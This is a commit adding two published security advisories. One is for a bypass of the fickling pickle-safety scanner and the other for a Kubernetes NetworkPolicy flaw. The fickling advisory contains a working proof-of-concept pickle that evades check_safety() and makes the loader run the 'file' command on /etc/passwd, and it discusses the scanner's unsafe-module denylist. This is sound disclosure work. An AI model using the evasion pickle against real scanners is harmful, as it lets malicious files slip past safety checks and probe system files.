Publish Advisories

advisory-database[bot] · advisory-database[bot] · commit b4d33a32d36f · 2026-03-13T21:01:19.000Z
GHSA-5cxw-w2xg-2m8h GHSA-7x23-j8gv-v54x
diff --git a/advisories/github-reviewed/2026/03/GHSA-5cxw-w2xg-2m8h/GHSA-5cxw-w2xg-2m8h.json b/advisories/github-reviewed/2026/03/GHSA-5cxw-w2xg-2m8h/GHSA-5cxw-w2xg-2m8h.json
@@ -0,0 +1,66 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-5cxw-w2xg-2m8h",
+  "modified": "2026-03-13T20:58:10Z",
+  "published": "2026-03-13T20:58:10Z",
+  "aliases": [],
+  "summary": "fickling's `platform` module subprocess invocation evades `check_safety()` with `LIKELY_SAFE`",
+  "details": "# Our assessment\n\nWe added `platform` to the blocklist of unsafe modules (https://github.com/trailofbits/fickling/commit/351ed4d4242b447c0ffd550bb66b40695f3f9975). \n\nIt was not possible to inject extra arguments to `file` without first monkey-patching `platform._follow_symlinks` with the pickle, as it always returns an absolute path. We independently hardened it with https://github.com/trailofbits/fickling/commit/b9e690c5a57ee9cd341de947fc6151959f4ae359 to reduce the risk of obtaining direct module references while evading detection.\n\nhttps://github.com/python/cpython/blob/6d1e9ceed3e70ebc39953f5ad4f20702ffa32119/Lib/platform.py#L687-L695\n```python\ntarget = _follow_symlinks(target)\n# \"file\" output is locale dependent: force the usage of the C locale\n# to get deterministic behavior.\nenv = dict(os.environ, LC_ALL='C')\ntry:\n    # -b: do not prepend filenames to output lines (brief mode)\n    output = subprocess.check_output(['file', '-b', target],\n                                     stderr=subprocess.DEVNULL,\n                                     env=env)\n```\n\n# Original report\n\n## Summary\nA crafted pickle invoking `platform._syscmd_file`, `platform.architecture`, or `platform.libc_ver` passes `check_safety()` with `Severity.LIKELY_SAFE` and zero findings. During `fickling.loads()`, these functions invoke `subprocess.check_output` with attacker-controlled arguments or read arbitrary files from disk.\n\n**Clarification:** The subprocess call uses a list argument (`['file', '-b', target]`), not `shell=True`, so the attacker controls the file path argument to the `file` command, not the command itself. The impact is subprocess invocation with attacker-controlled arguments and information disclosure (file type probing), not arbitrary command injection.\n\n## Affected versions\n`<= 0.1.9` (verified on upstream HEAD as of 2026-03-04)\n\n## Non-duplication check against published Fickling GHSAs\nNo published advisory covers `platform` module false-negative bypass. This follows the same structural pattern as GHSA-5hwf-rc88-82xm (missing modules in `UNSAFE_IMPORTS`) but covers a distinct set of functions.\n\n## Root cause\n1. `platform` not in `UNSAFE_IMPORTS` denylist.\n2. `OvertlyBadEvals` skips calls imported from stdlib modules.\n3. `UnusedVariables` heuristic neutralized by making call result appear used (`SETITEMS` path).\n\n## Reproduction (clean upstream)\n```python\nfrom unittest.mock import patch\nimport fickling\nimport fickling.fickle as op\nfrom fickling.fickle import Pickled\nfrom fickling.analysis import check_safety\n\npickled = Pickled([\n    op.Proto.create(4),\n    op.ShortBinUnicode('platform'),\n    op.ShortBinUnicode('_syscmd_file'),\n    op.StackGlobal(),\n    op.ShortBinUnicode('/etc/passwd'),\n    op.TupleOne(),\n    op.Reduce(),\n    op.Memoize(),\n    op.EmptyDict(),\n    op.ShortBinUnicode('init'),\n    op.ShortBinUnicode('x'),\n    op.SetItem(),\n    op.Mark(),\n    op.ShortBinUnicode('trace'),\n    op.BinGet(0),\n    op.SetItems(),\n    op.Stop(),\n])\n\nresults = check_safety(pickled)\nprint(results.severity.name, len(results.results))  # LIKELY_SAFE 0\n\nwith patch('subprocess.check_output', return_value=b'ASCII text') as mock_sub:\n    fickling.loads(pickled.dumps())\n    print('subprocess called?', mock_sub.called)       # True\n    print('args:', mock_sub.call_args[0])               # (['file', '-b', '/etc/passwd'],)\n```\n\nAdditional affected functions (same pattern):\n- `platform.architecture('/etc/passwd')` — calls `_syscmd_file` internally\n- `platform.libc_ver('/etc/passwd')` — opens and reads arbitrary file contents\n\n## Minimal patch diff\n```diff\n--- a/fickling/fickle.py\n+++ b/fickling/fickle.py\n@@\n+        \"platform\",\n```\n\n## Validation after patch\n- Same PoC flips to `LIKELY_OVERTLY_MALICIOUS`\n- `fickling.loads` raises `UnsafeFileError`\n- `subprocess.check_output` is not called\n\n## Impact\n- **False-negative verdict:** `check_safety()` returns `LIKELY_SAFE` with zero findings for a pickle that invokes a subprocess with attacker-controlled arguments.\n- **Subprocess invocation:** `platform._syscmd_file` calls `subprocess.check_output(['file', '-b', target])` where `target` is attacker-controlled. The `file` command reads file headers and returns type information, enabling file existence and type probing.\n- **File read:** `platform.libc_ver` opens and reads chunks of an attacker-specified file path.",
+  "severity": [
+    {
+      "type": "CVSS_V4",
+      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "PyPI",
+        "name": "fickling"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "0.1.10"
+            }
+          ]
+        }
+      ],
+      "database_specific": {
+        "last_known_affected_version_range": "<= 0.1.9"
+      }
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/trailofbits/fickling/security/advisories/GHSA-5cxw-w2xg-2m8h"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/trailofbits/fickling/commit/351ed4d4242b447c0ffd550bb66b40695f3f9975"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/trailofbits/fickling"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/trailofbits/fickling/releases/tag/v0.1.10"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-184"
+    ],
+    "severity": "MODERATE",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-03-13T20:58:10Z",
+    "nvd_published_at": null
+  }
+}
diff --git a/advisories/github-reviewed/2026/03/GHSA-7x23-j8gv-v54x/GHSA-7x23-j8gv-v54x.json b/advisories/github-reviewed/2026/03/GHSA-7x23-j8gv-v54x/GHSA-7x23-j8gv-v54x.json
@@ -0,0 +1,69 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-7x23-j8gv-v54x",
+  "modified": "2026-03-13T20:58:28Z",
+  "published": "2026-03-13T20:58:28Z",
+  "aliases": [
+    "CVE-2026-32720"
+  ],
+  "summary": "github.com/ctfer-io/monitoring Vulnerable to Improper Access Control",
+  "details": "### Impact\n\nDue to a mis-written NetworkPolicy, a malicious actor can pivot from a component to any other namespace.\nThis breaks the security-by-default property expected as part of the deployment program, leading to a potential lateral movement.\n\n### Patch\n\nRemoving the `inter-ns` NetworkPolicy patches the vulnerability. If updates are not possible in production environments, we recommend to manually delete it and update as soon as possible.\n\n### Workaround\n\nGiven your context, delete the failing network policy that should be prefixed by `inter-ns-` in the monitoring namespace.\nYou can use the following to delete all matching network policy. If unsure of the outcome, please do it manually.\n\n```bash\nfor ns in $(kubectl get ns -o jsonpath='{.items[*].metadata.name}' | tr ' ' '\\n' | grep '^monitoring-'); do\n  kubectl -n \"$ns\" get networkpolicy -o name \\\n  | grep '^networkpolicy.networking.k8s.io/inter-ns-' \\\n  | xargs -r kubectl -n \"$ns\" delete\ndone\n```",
+  "severity": [
+    {
+      "type": "CVSS_V4",
+      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "Go",
+        "name": "github.com/ctfer-io/monitoring"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "0.2.1"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/ctfer-io/monitoring/security/advisories/GHSA-7x23-j8gv-v54x"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/ctfer-io/monitoring/pull/168"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/ctfer-io/monitoring/commit/5404a11863b32b14ee5c62d1215352ab519d4edb"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/ctfer-io/monitoring"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/ctfer-io/monitoring/releases/tag/v0.2.1"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-284"
+    ],
+    "severity": "HIGH",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-03-13T20:58:28Z",
+    "nvd_published_at": null
+  }
+}
